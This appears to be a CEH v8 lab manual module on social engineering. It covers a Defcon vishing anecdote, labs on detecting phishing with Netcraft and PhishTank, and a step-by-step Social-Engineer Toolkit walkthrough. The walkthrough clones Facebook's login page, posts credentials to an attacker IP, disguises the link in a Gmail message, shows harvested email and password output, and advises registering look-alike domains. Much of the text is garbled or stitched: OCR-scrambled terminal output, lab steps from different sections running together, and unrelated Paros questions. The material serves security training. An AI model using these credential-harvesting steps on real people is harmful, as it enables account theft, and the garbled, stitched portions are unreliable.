CEH v8 Labs Module 09 Social Engineering.pdf

  • 8/14/2019 CEH v8 Labs Module 09 Social Engineering.pdf

    CEH Lab Manual

    Social Engineering

    Module 09

    Module 09 - Social Engineering

    Social Engineering

    Social engineering is the art of convincing people to reveal confidential information.

    Lab Scenario

    Source: http://money.cnn.com/2012/08/07/technology/walmart-hack-defcon/index.htm

    Social engineering is essentially the art of gaining access to buildings, systems, or data by exploiting human psychology, rather than by breaking in or using technical hacking techniques. The term social engineering can also mean an attempt to gain access to information, primarily through misrepresentation, and often relies on the trusting nature of most individuals. For example, instead of trying to find a software vulnerability, a social engineer might call an employee and pose as an IT support person, trying to trick the employee into divulging his password.

    Shane MacDougall, a hacker/security consultant, duped a Wal-Mart employee into giving him information that could be used in a hacker attack to win a coveted black badge in the social engineering contest at the Defcon hackers' conference in Las Vegas.

    In this year's Capture the Flag social engineering contest at Defcon, champion Shane MacDougall used lying, a lucrative (albeit bogus) government contract, and his talent for self-effacing small talk to squeeze the following information out of Wal-Mart:

    The small-town Canadian Wal-Mart store's janitorial contractor

    Its cafeteria food-services provider

    Its employee pay cycle

    Its staff shift schedule

    The time managers take their breaks

    Where they usually go for lunch

    Type of PC used by the manager

    Make and version numbers of the computer's operating system, and

    Its web browser and antivirus software

    Stacy Cowley at CNNMoney wrote up the details of how Wal-Mart got taken in to the extent of coughing up so much scam-worthy treasure.

    Calling from his sound-proofed booth at Defcon, MacDougall placed an urgent call, broadcast to the entire Defcon audience, to a Wal-Mart store manager in Canada, introducing himself as "Gary Darnell" from Wal-Mart's home office in Bentonville, Ark.

    Ethical Hacking and Countermeasures Copyright by EC-Council

    All Rights Reserved. Reproduction is Strictly Prohibited.

    The role-playing visher (vishing being phone-based phishing) told the manager that Wal-Mart was looking at the possibility of winning a multimillion-dollar government contract.

    "Darnell" said that his job was to visit a few Wal-Mart stores that had been chosen as potential pilot locations.

    But first, he told the store manager, he needed a thorough picture of how the store operated.

    In the conversation, which lasted about 10 minutes, "Darnell" described himself as a newly hired manager of government logistics.

    He also spoke offhand about the contract: "All I know is Wal-Mart can make a ton of cash off it," he said, then went on to talk about his upcoming visit, keeping up a steady patter about the project and life in Bentonville, Cowley writes.

    As if this wasn't bad enough, MacDougall/Darnell directed the manager to an external site to fill out a survey in preparation for his upcoming visit.

    The compliant manager obliged, plugging the address into his browser.

    When his computer blocked the connection, MacDougall didn't miss a beat, telling the manager that he'd call the IT department and get the site unlocked.

    After ending the call, stepping out of the booth and accepting his well-earned applause, MacDougall became the first Capture the Flag champion to capture every data point, or flag, on the competition checklist in the three years it has been held at Defcon. Defcon gives contestants two weeks to research their targets. Touchy information such as social security numbers and credit card numbers are verboten, given that Defcon has no great desire to bring the law down on its head.

    Defcon also keeps its nose clean by abstaining from recording the calls, which is against Nevada law. However, there's no law against broadcasting calls live to an audience, which makes it legal for the Defcon audience to have listened as MacDougall pulled down Wal-Mart's pants.

    MacDougall said, "Companies are way more aware about their security. They've got firewalls, intrusion detection, log-in systems going into place, so it's a lot harder for a hacker to break in these days, or to at least break in undetected. So a bunch of hackers now are going to the weakest link, and the link that companies just aren't protecting, which is the people."

    MacDougall also shared a few best practices to be followed to avoid falling victim to a social engineer:

    Never be afraid to say no. If something feels wrong, something is wrong

    An IT department should never be calling asking about operating systems, machines, passwords or email systems; they already know

    Set up an internal company security word of the day and don't give any information to anyone who doesn't know it

    Keep tabs on what's on the web. Companies inadvertently release tons of information online, including through employees' social media sites

    As an expert ethical hacker and penetration tester, you should circulate the best practices to be followed among the employees.

    Lab Objectives

    The objective of this lab is to:

    Detect phishing sites

    Protect the network from phishing attacks

    To carry out this lab, you need:

    A computer running Windows Server 2012

    A web browser with Internet access

    Lab Duration

    Time: 20 Minutes

    Overview of Social Engineering

    Social engineering is the art of convincing people to reveal confidential information. Social engineers depend on the fact that people are aware of certain valuable information and are careless in protecting it.

    Lab Tasks

    Recommended labs to assist you in social engineering:

    Social engineering

    Detecting phishing using Netcraft

    Detecting phishing using PhishTank

    Lab Analysis

    Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

    Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 09 Social Engineering

    Detecting Phishing Using Netcraft

    Netcraft provides web server and web hosting market-share analysis, including web server and operating system detection.

    Lab Scenario

    By now you are familiar with how social engineering is performed and what sort of information can be gathered by a social engineer.

    Phishing is an example of a social engineering technique used to deceive users, and it exploits the poor usability of current web security technologies.

    Phishing is the act of attempting to acquire information such as user names, passwords, and credit card details (and sometimes, indirectly, money) by masquerading as a trustworthy entity in an electronic communication. Communications claiming to be from popular social websites, auction sites, online payment processors, or IT administrators are commonly used to lure the unsuspecting public. Phishing emails may contain links to websites that are infected with malware. Phishing is typically carried out by email spoofing or instant messaging and it often directs users to enter details at a fake website whose look and feel is almost identical to the legitimate one.

    Phishers are targeting the customers of banks and online payment services. They send messages to the bank customers by manipulating URLs and website forgery. The messages sent claim to be from a bank and they look legitimate; users, not realizing that it is a fake website, provide their personal information and bank details. Not all phishing attacks require a fake website; messages that claim to be from a bank tell users to dial a phone number regarding problems with their bank accounts. Once the phone number (owned by the phisher, and provided by a Voice over IP service) is dialed, it prompts users to enter their account numbers and PIN. Vishing (voice phishing) sometimes uses fake caller-ID data to give the appearance that calls come from a trusted organization.

    Since you are an expert ethical hacker and penetration tester, you must be aware of phishing attacks occurring on the network and implement anti-phishing measures. In an organization, proper training must be provided to people to deal with phishing attacks. In this lab you will be learning to detect phishing using Netcraft.

    Lab Objectives

    This lab will show you phishing sites using a web browser and show you how to use them. It will teach you how to:

    Detect phishing sites

    Protect the network from phishing attack

    To carry out this lab you need:

    Netcraft is located at D:\CEH-Tools\CEHv8 Module 09 Social Engineering\Anti-Phishing Toolbar\Netcraft Toolbar

    You can also download the latest version of Netcraft Toolbar from the link http://toolbar.netcraft.com/

    If you decide to download the latest version, then screenshots shown in the lab might differ

    A computer running Windows Server 2012

    A web browser (Firefox, Internet Explorer, etc.) with Internet access

    Administrative privileges to run the Netcraft toolbar

    Lab Duration

    Time: 10 Minutes

    Overview of Netcraft Toolbar

    Netcraft Toolbar provides Internet security services, including anti-fraud and anti-phishing services, application testing, code reviews, automated penetration testing, and research data and analysis on many aspects of the Internet.

    Lab Tasks

    1. To start this lab, you need to launch a web browser first. In this lab we have used Mozilla Firefox.

    2. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

    FIGURE 1.1: Windows Server 2012 - Start Menu

    3. Click the Mozilla Firefox app to launch the browser.

    FIGURE 1.2: Windows Server 2012 - Start Menu Apps view

    4. To download the Netcraft Toolbar for Mozilla Firefox, enter http://toolbar.netcraft.com in the address bar of the browser or drag and drop the netcraft_toolbar-1.7-fx.xpi file in Firefox.

    5. In this lab, we are downloading the toolbar from the Internet.

    6. In Firefox browser, click Download the Netcraft Toolbar to install as the add-on.

    FIGURE 2.1: Windows Server 2012 - Start Menu

    3. Click the Mozilla Firefox app to launch the browser.

    FIGURE 2.2: Windows Server 2012 - Start Menu Apps view

    4. Type http://www.phishtank.com in the address bar of the web browser and press Enter.

    5. You will see the following:

    PhishTank provides an open API for developers and researchers to integrate anti-phishing data into their applications at no charge.

    FIGURE 2.3: Welcome screen of PhishTank

    6. Type the website URL to be checked for phishing, for example, http://sdapld21.host21.com.

    7. Click Is it a phish?.

    PhishTank is operated by OpenDNS to improve the Internet through safer, faster, and smarter DNS.

    FIGURE 2.4: Checking for site

    If the site is a phishing site, you see the following warning dialog box.

    Submission #1571567 is currently ONLINE

    FIGURE 2.5: Warning dialog for phishing site

    Lab Analysis

    Document all the websites and verify whether they are phishing sites.

    OpenDNS is interested in having the best available information about phishing websites.

    Tool/Utility | Information Collected/Objectives Achieved

    PhishTank | Phishing site detected

    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

    Questions

    1. Evaluate what PhishTank wants to hear about spam.

    2. Does PhishTank protect you from phishing?

    3. Why is OpenDNS blocking a phish site that PhishTank doesn't list or has not yet verified?

    Internet Connection Required: [x] Yes  [ ] No

    Platform Supported: [x] Classroom  [ ] iLabs

    Social Engineering Penetration Testing using Social Engineering Toolkit (SET)

    The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing around social engineering.

    Lab Scenario

    Social engineering is an ever-growing threat to organizations all over the world. Social engineering attacks are used to compromise companies every day. Even though there are many hacking tools available with underground hacking communities, a social engineering toolkit is a boon for attackers as it is freely available to use to perform spear-phishing attacks, website attacks, etc. Attackers can draft email messages and attach malicious files and send them to a large number of people using the spear-phishing attack method. Also, the multi-attack method allows utilization of the Java applet, Metasploit browser, Credential Harvester/Tabnabbing, etc. all at once.

    Though numerous sorts of attacks can be performed using this toolkit, this is also a must-have tool for a penetration tester to check for vulnerabilities. SET is the standard for social-engineering penetration tests and is supported heavily within the security community.

    As an ethical hacker, penetration tester, or security administrator you should be extremely familiar with the Social Engineering Toolkit to perform various tests for vulnerabilities on the network.

    Lab Objectives

    The objective of this lab is to help students learn to:

    Clone a website

    Obtain user names and passwords using the Credential Harvester method

    Generate reports for conducted penetration tests

    Lab Environment

    To carry out the lab, you need:

    Run this tool in BackTrack Virtual Machine

    Web browser with Internet access

    Administrative privileges to run tools

    Lab Duration

    Time: 10 Minutes

    Overview of Social Engineering Toolkit

    Social-Engineer Toolkit is an open-source Python-driven tool aimed at penetration testing around Social-Engineering. SET is specifically designed to perform advanced attacks against the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.

    Lab Tasks

    1. Log in to your BackTrack virtual machine.

    2. Select Applications -> BackTrack -> Exploitation Tools -> Social Engineering Tools -> Social Engineering Toolkit and click Set.

    3. A Terminal window for SET will appear. Type y and press Enter to agree to the terms of service.

    THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

    The above licensing was taken from the BSD licensing and is applied to Social-Engineer Toolkit as well.

    Note that the Social-Engineer Toolkit is provided as is, and is a royalty free open-source application.

    Feel free to modify, use, change, market, do whatever you want with it as long as you give the appropriate credit where credit is due (which means giving the authors the credit they deserve for writing it). Also note that by using this software, if you ever see the creator of SET in a bar, you are required to give him a hug and buy him a beer. Hug must last at least 5 seconds. Author holds the right to refuse the hug or the beer.

    [...]

    Join us on irc.freenode.net in channel #setoolkit

    The Social-Engineer Toolkit is a product of TrustedSec.

    Visit: https://www.trustedsec.com

    Select from the menu:

       1) Spear-Phishing Attack Vectors
       2) Website Attack Vectors
       3) Infectious Media Generator
       4) Create a Payload and Listener
       5) Mass Mailer Attack
       6) Arduino-Based Attack Vector
       7) SMS Spoofing Attack Vector
       8) Wireless Access Point Attack Vector
       9) QRCode Generator Attack Vector
      10) Powershell Attack Vectors
      11) Third Party Modules

      99) Return back to the main menu.

       1) Java Applet Attack Method
       2) Metasploit Browser Exploit Method
       3) Credential Harvester Attack Method
       4) Tabnabbing Attack Method
       5) Man Left in the Middle Attack Method
       6) Web Jacking Attack Method
       7) Multi-Attack Web Method
       8) Victim Web Profiler
       9) Create or import a CodeSigning Certificate

      99) Return to Main Menu

    set:webattack>3

    FIGURE 3.4: Social Engineering Attacks menu

    6. In the next set of menus that appears, type 3 and press Enter to select the Credential Harvester Attack Method.

    and the Back|Track team. This method utilizes iframe replacements to
    make the highlighted URL link to appear legitimate however when clicked
    a window pops up then is replaced with the malicious link. You can edit
    the link replacement settings in the set_config if its too slow/fast.

    The Multi-Attack method will add a combination of attacks through the web attack
    menu. For example you can utilize the Java Applet, Metasploit Browser,
    Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
    all at once to see which is successful.

    FIGURE 3.5: Website Attack Vectors menu

    7. Now, type 2 and press Enter to select the Site Cloner option from the menu.

    The Social-Engineer Toolkit "Web Attack" vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

    The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.

       9) Create or import a CodeSigning Certificate

      99) Return to Main Menu

    set:webattack>3

    The first method will allow SET to import a list of pre-defined web
    applications that it can utilize within the attack.

    The second method will completely clone a website of your choosing
    and allow you to utilize the attack vectors within the completely
    same web application you were attempting to clone.

    The third method allows you to import your own website, note that you
    should only have an index.html when using the import website
    functionality.

       1) Web Templates
       2) Site Cloner
       3) Custom Import

      99) Return to Webattack Menu

    set:webattack>2

    The Site Cloner is used to clone a website of your choice.

    FIGURE 3.6: Credential Harvester Attack menu

    8. Type the IP address of your BackTrack virtual PC in the prompt for IP address for the POST back in Harvester/Tabnabbing and press Enter. In this example, the IP is 10.0.0.15

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15

    FIGURE 3.7: Providing IP address in Harvester/Tabnabbing

    9. Now, you will be prompted for a URL to be cloned; type the desired URL for Enter the url to clone and press Enter. In this example, we have used www.facebook.com. This will initiate the cloning of the specified website.

    The tabnabbing attack method is used when a victim has multiple tabs open, when the user clicks the link, the victim will be presented with a "Please wait while the page loads". When the victim switches tabs because he/she is multi-tasking, the website detects that a different tab is present and rewrites the webpage to a website you specify. The victim clicks back on the tab after a period of time and thinks they were signed out of their email program or their business application and types the credentials in. When the credentials are inserted, they are harvested and the user is redirected back to the original website.

    * Te rm in a l

    File Edit View Terminal Help

    an d a l lo w y ou t o u t i l i z e t h e a t t a c k v e c t o r s w i t h i n t h e c o m p l e te l y

    same web a p p l ic a t i o n y ou w ere a tt e m p tin g t o c l o n e T ^ ^ ^ ^ ^ ^ ^

    The th i r d me th od a l lo w s yo u to im p o r t - ym j r own we b s i te , n o te th a t yoush o u ld o n l y h a ve a n in d e x .h tm l wh en u s i n g th e im p o r t we b s i te

    f u n c t i o n a l i t y .

    u t i l iz e t h e c lo n e c a p a b i li ti e s w i t h i r

    1) Web Templates

    2 ) S i t e C l o n e r

    3) Custom Import

    99) R eturn to Webattack Menu

    :we b a t ta ck>2

    h a t IP th e se r ve r w i l l POST to .

    [ ] C r e d e n t i a l h a rv e s t e r w i l l a l lo w y o u t o

    Jr> 1 T JT] ] t o h a r v e s t c r e d e n t i a l s o r p a ra m e t er s f

    3r A

    rom a we bsi te as w e l l as p lace them i r

    to a r e p o r t I ^ % I % I V J 1

    [-] T h i s o p t i o n i s u se d f o r | h a t I P t h e s e r v e r w i l l P OST t o . V ^ M[ ] I f y o u ' r e u s i n g an e x t e r n a l I P , u s e y o u r e x t e r n a l I P f o r t h i s

    s e t :we b a t ta ck> IP a d d re ss fo r th e P OST b a ck i n H a rve s te r /Ta b n a b b in g :1 0 .0 .0 .1 5

    [ ] SET su pp ort s b oth HTTP and HTTPS

    [- ] Example : h t t p : / /w w w . th i s i s a f a k e s i t e . com____________

    ; e t :we b a t ta ck> E n te r th e u r l t o c l o n e :Rvww. fa ce b o o k . com!

    FIG U R E 3.8: Providing U R L to be cloned

    10. After cloning is completed, the highlighted message, as shown in the following screenshot, will appear on the Terminal screen of SET. Press Enter to continue.

    11. It will start Credential Harvester.

    99) Return to Webattack Menu

    set:webattack>2
    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue

    FIGURE 3.9: SET Website Cloning

    12. Leave the Credential Harvester Attack to fetch information from the victim's machine.

    The web jacking attack method will create a website clone and present the victim with a link stating that the website has moved. This is a new feature to version 0.7.

    If you're doing a penetration test, register a name that's similar to the victim, for Gmail you could do gmail.com (notice the 1), something similar that can mistake the user into thinking it's the legitimate


    [-] Credential harvester will allow you to utilize the clone capabilities within SET
    [-] to harvest credentials or parameters from a website as well as place them into a report
    [-] This option is used for what IP the server will POST to.
    [-] If you're using an external IP, use your external IP for this
    set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.0.0.15
    [-] SET supports both HTTP and HTTPS
    [-] Example: http://www.thisisafakesite.com
    set:webattack> Enter the url to clone:www.facebook.com

    [*] Cloning the website: https://login.facebook.com/login.php
    [*] This could take a little bit...

    The best way to use this attack is if username and password form
    fields are available. Regardless, this captures all POSTs on a website.
    [!] I have read the above message.

    Press <return> to continue

    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:

    FIGURE 3.10: SET Credential Harvester Attack

    13. Now, you have to send the IP address of your BackTrack machine to a victim and trick him or her to click to browse the IP address.

    14. For this demo, launch your web browser in the BackTrack machine; launch your favorite email service. In this example we have used www.gmail.com. Log in to your Gmail account and compose an email.

    FIGURE 3.11: Composing email in Gmail

    15. Place the cursor in the body of the email where you wish to place the fake URL. Then, click the Link icon.

    When you hover over the link, the URL will be presented with the real URL, not the attacker's machine. So for example if you're cloning gmail.com, the URL when hovered over it would be gmail.com. When the user clicks the moved link, Gmail opens and then is quickly replaced with your malicious webserver. Remember you can change the timing of the webjacking attack in the config/set_config flags.

    Most of the time they won't even notice the IP but it's just another way to ensure it goes on without a hitch. Now that the victim enters the username and password in the fields, you will notice that we can intercept the credentials now.


    [Screenshot: Gmail Compose Mail window in Mozilla Firefox, subject "TGIF - Party Pictures"]

    FIGURE 3.12: Linking Fake URL to Actual URL

    16. In the Edit Link window, first type the actual address in the Web address field under the Link to option and then type the fake URL in the Text to display field. In this example, the web address we have used is http://10.0.0.15 and text to display is www.facebook.com/Rini TGIF. Click OK.

    [Screenshot: Gmail Edit Link dialog with the "Text to display" and "Web address" fields filled in]

    FIGURE 3.13: Edit Link window

    17. The fake URL should appear in the email body, as shown in the following screenshot.
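A defender-side check for the kind of link built in steps 15 to 17, where the displayed text names one host and the web address points somewhere else. This is an added example, not part of the lab manual or of SET; the function names, reason labels and sample body are constructed for illustration, and the two values in the first sample link are the ones from step 16.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

URLISH = re.compile(r"^(?:https?://)?(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)  # text shaped like a host

def host_of(value):
    """Lower-cased host of a URL or bare domain, minus a leading 'www.'."""
    url = value.strip() if "://" in value else "http://" + value.strip()
    return (urlsplit(url).hostname or "").lower().removeprefix("www.")

def is_ip_literal(host):
    try:
        return ipaddress.ip_address(host) is not None
    except ValueError:
        return False

class LinkAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        href = dict(attrs).get("href") or ""
        if tag == "a" and href.lower().startswith(("http://", "https://")):
            self._href, self._text = href, []
    def handle_data(self, data):
        self._text.append(data)  # reset at each <a>, read only at its </a>
    def handle_endtag(self, tag):
        if tag != "a" or self._href is None:
            return
        href, text, self._href = self._href, "".join(self._text).strip(), None
        target, reasons = host_of(href), []
        if is_ip_literal(target):
            reasons.append("href-is-ip-literal")
        if URLISH.match(text) and host_of(text) != target:
            reasons.append("text-host-differs-from-href")
        if reasons:
            self.findings.append({"href": href, "text": text, "reasons": reasons})

def audit_links(html_body):
    """Return a finding for each http(s) link that targets an IP or whose text names another host."""
    auditor = LinkAuditor()
    auditor.feed(html_body)
    return auditor.findings

SAMPLE = (  # constructed body; the first link uses the values from step 16
    '<p>Please click this link <a href="http://10.0.0.15">www.facebook.com/Rini TGIF</a></p>'
    '<p><a href="https://www.facebook.com/help">facebook.com/help</a></p>')
```

`audit_links(SAMPLE)` reports only the first link, with both reasons. Hosts are compared in full, so a link to a subdomain of the displayed host is also reported; compare registrable domains instead if that is too noisy for a mail gateway.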


    [Screenshots: Gmail Compose Mail window with the link text shown in the email body]


    [Screenshot: Facebook login page with "Email or Phone" and "Password" fields]


    [*] Social-Engineer Toolkit Credential Harvester Attack
    [*] Credential Harvester is running on port 80
    [*] Information will be displayed to you as it arrives below:
    10.0.0.2 - - [26/Sep/2012 11:10:41] GET / HTTP/1.1 200 -
    [*] WE GOT A HIT! Printing the output:
    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=[unreadable]
    PARAM: timezone=-330
    PARAM: lgnrnd=224034_ArYA
    PARAM: default_persistent=0
    POSSIBLE USERNAME FIELD FOUND: login=Log+In
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.

    FIGURE 3.17: SET found Username and Password

    22. Press CTRL+C to generate a report for this attack performed.

    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=[unreadable]
    PARAM: timezone=-540
    PARAM: lgnrnd=224034_ArYA
    PARAM: lgnjs=n
    POSSIBLE USERNAME FIELD FOUND: email=[unreadable]
    POSSIBLE PASSWORD FIELD FOUND: pass=test
    PARAM: default_persistent=0
    POSSIBLE USERNAME FIELD FOUND: login=Log+In
    [*] WHEN YOU'RE FINISHED, HIT CONTROL-C TO GENERATE A REPORT.
    ^C[*] File exported to reports/2012-09-26 15:49:15.546415.html for your reading pleasure...
    [*] File in XML format exported to reports/2012-09-26 15:49:15.546415.xml for your reading pleasure...

    Press <return> to continue


    Tool/Utility: Social Engineering Toolkit

    Information Collected/Objectives Achieved:

    PARAM: lsd=AVqgmkGh
    PARAM: return_session=0
    PARAM: legacy_return=1
    PARAM: display=
    PARAM: session_key_only=0
    PARAM: trynum=1
    PARAM: charset_test=[unreadable]
    PARAM: timezone=-540
    PARAM: lgnrnd=224034_ArYA
    PARAM: lgnjs=n
    email=samchoang@yahoo.com
    pass=test@123

    PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

    Questions

    1. Evaluate each of the following Paros proxy options:

    a. Trap Request
    b. Trap Response
    c. Continue button
    d. Drop button

    Internet Connection Required: ☑ Yes  ☐ No

    Platform Supported: ☑ Classroom  ☐ iLabs
